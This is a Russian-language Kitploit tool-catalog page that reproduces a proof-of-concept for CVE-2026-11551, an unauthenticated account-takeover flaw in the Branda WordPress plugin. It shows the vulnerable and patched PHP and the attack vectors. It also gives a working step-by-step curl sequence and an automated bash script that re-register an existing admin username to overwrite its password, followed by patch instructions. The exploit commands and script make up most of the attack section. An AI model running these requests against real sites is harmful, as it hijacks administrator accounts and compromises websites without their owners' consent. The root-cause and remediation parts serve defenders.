Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
By-Poloss..-..CVE-2026-11551-PoC — Unauthenticated Privilege Escalation via Account Takeover | Kitploit
Инструменты/GitHubGitHub/polosss/by-poloss..-..cve-2026-11551-poc
Privilege EscalationPassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubpolosss/by-poloss..-..cve-2026-11551-poc

By-Poloss..-..CVE-2026-11551-PoC

Unauthenticated Privilege Escalation via Account Takeover

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
12 месяцев назадЕщё не проверено

CVE-2026-11551: Branda Plugin - Неаутентифицированное повышение привилегий через захват аккаунта

Обзор

  • CVE ID: CVE-2026-11551
  • CVSS Score: 9.8 (Критический)
  • Затронуто: Branda – White Label & Branding <= 3.4.29
  • Исправлено: 3.4.31
  • Опубликовано: 19 июня 2026 г.

Описание уязвимости

Плагин Branda для WordPress уязвим к повышению привилегий через захват аккаунта во всех версиях до 3.4.29 включительно. Это связано с тем, что плагин не проверяет должным образом личность пользователя перед обновлением его пароля. Это позволяет неаутентифицированным злоумышленникам изменять пароли произвольных пользователей, включая администраторов, и использовать это для получения доступа к их аккаунту.

Технический анализ

Местоположение уязвимого кода

/inc/modules/login-screen/signup-password.php

Корневая причина

Функция pre_insert_user_data() в уязвимой версии не имеет надлежащей проверки:

root@kitploit:~
// Vulnerable version (3.4.29)
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite code...
    }
    // Missing: if ($update) return $data; <-- VULNERABILITY
    
    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        // Set the password from POST data
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Исправленный код (3.4.31)

root@kitploit:~
public function pre_insert_user_data( $data, $update, $id ) {
    if ( is_multisite() ) {
        // Multisite code with proper checks...
    }

    // FIX: Added check to prevent updating existing users
    if ( $update ) {
        return $data;
    }

    if ( empty( $data['user_pass'] ) && empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( wp_generate_password( 20, false ) );
    } elseif ( ! empty( $_POST['password_1'] ) ) {
        $data['user_pass'] = wp_hash_password( $_POST['password_1'] );
    }

    return $data;
}

Векторы атак

Вектор 1: Регистрация в мультисайте (основной)

  1. Злоумышленник переходит на /wp-signup.php
  2. Регистрируется с существующим именем администратора (например, "admin")
  3. Устанавливает собственный пароль через параметр password_1
  4. Branda сохраняет пароль в метаданных регистрации
  5. При активации пароль перезаписывает пароль существующего администратора

Вектор 2: Регистрация на одиночном сайте

  1. Злоумышленник переходит на /wp-login.php?action=register
  2. Branda добавляет поля пароля в форму
  3. Злоумышленник отправляет регистрацию с существующим именем пользователя
  4. Если активация завершается, пароль устанавливается

Доказательство концепции (curl)

Шаг 1: Проверить, включена ли регистрация

root@kitploit:~
curl -s -k "https://TARGET/wp-login.php?action=register" | grep -i "registration"

Шаг 2: Определить тип WordPress (мультисайт или одиночный)

root@kitploit:~
curl -s -k -I "https://TARGET/wp-signup.php" | grep "HTTP/"

Шаг 3: Для мультисайта - регистрация с именем администратора

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-signup.php" \
  -d "user_name=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "signup_for=blog"

Шаг 4: Для одиночного сайта - регистрация

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php?action=register" \
  -d "user_login=admin" \
  -d "[email protected]" \
  -d "password_1=NewP@ssw0rd!" \
  -d "password_2=NewP@ssw0rd!" \
  -d "wp-submit=Register"

Шаг 5: Активировать (если требуется подтверждение по email)

root@kitploit:~
# Извлечь ключ активации из письма и перейти по ссылке:
curl -s -k -c cookies.txt -b cookies.txt \
  "https://TARGET/wp-activate.php?key=ACTIVATION_KEY"

Шаг 6: Проверить - попробовать войти

root@kitploit:~
curl -s -k -c cookies.txt -b cookies.txt \
  -X POST "https://TARGET/wp-login.php" \
  -d "log=admin" \
  -d "pwd=NewP@ssw0rd!" \
  -d "wp-submit=Log In" \
  -L | grep -i "dashboard\|wp-admin\|error"

Автоматизированный скрипт эксплуатации

root@kitploit:~
#!/bin/bash
TARGET="https://TARGET"
USERNAME="admin"
NEW_PASSWORD="Pwned$(date +%s)!"

echo "[*] Registering $USERNAME with password $NEW_PASSWORD..."

# Multisite attack
curl -s -k -c /tmp/cookies.txt \
  -X POST "$TARGET/wp-signup.php" \
  -d "user_name=$USERNAME" \
  -d "[email protected]" \
  -d "password_1=$NEW_PASSWORD" \
  -d "password_2=$NEW_PASSWORD"

echo "[*] Check email for activation link"
echo "[*] After activation, try: curl -X POST $TARGET/wp-login.php -d 'log=$USERNAME' -d 'pwd=$NEW_PASSWORD'"

Требования для эксплуатации

  1. WordPress с установленным и активированным плагином Branda <= 3.4.29
  2. Регистрация пользователей должна быть включена (проверьте Настройки > Общие > Членство: Любой может зарегистрироваться)
  3. Для успешного захвата аккаунта: целевое имя пользователя должно существовать
  4. Для мультисайта: доступ к письму активации (или обход активации)

Устранение

Обновите плагин Branda до версии 3.4.31 или новее:

root@kitploit:~
# Через админ-панель WordPress
Dashboard > Plugins > Branda > Update

# Через WP-CLI
wp plugin update branda-white-labeling

# Через SSH
wp plugin update branda-white-labeling --version=3.4.31

Воздействие

  • Конфиденциальность: Высокий - Злоумышленник получает доступ к любому аккаунту пользователя
  • Целостность: Высокий - Злоумышленник может изменять содержимое
  • Доступность: Высокий - Злоумышленник может заблокировать легитимных пользователей

Ссылки

  • Wordfence Intelligence
  • WPScan
  • Plugin Trac

W.P.E.F

  • W.P.E.F Telegram chanel #1
  • W.P.E.F Telegram chanel #2
Скачать инструмент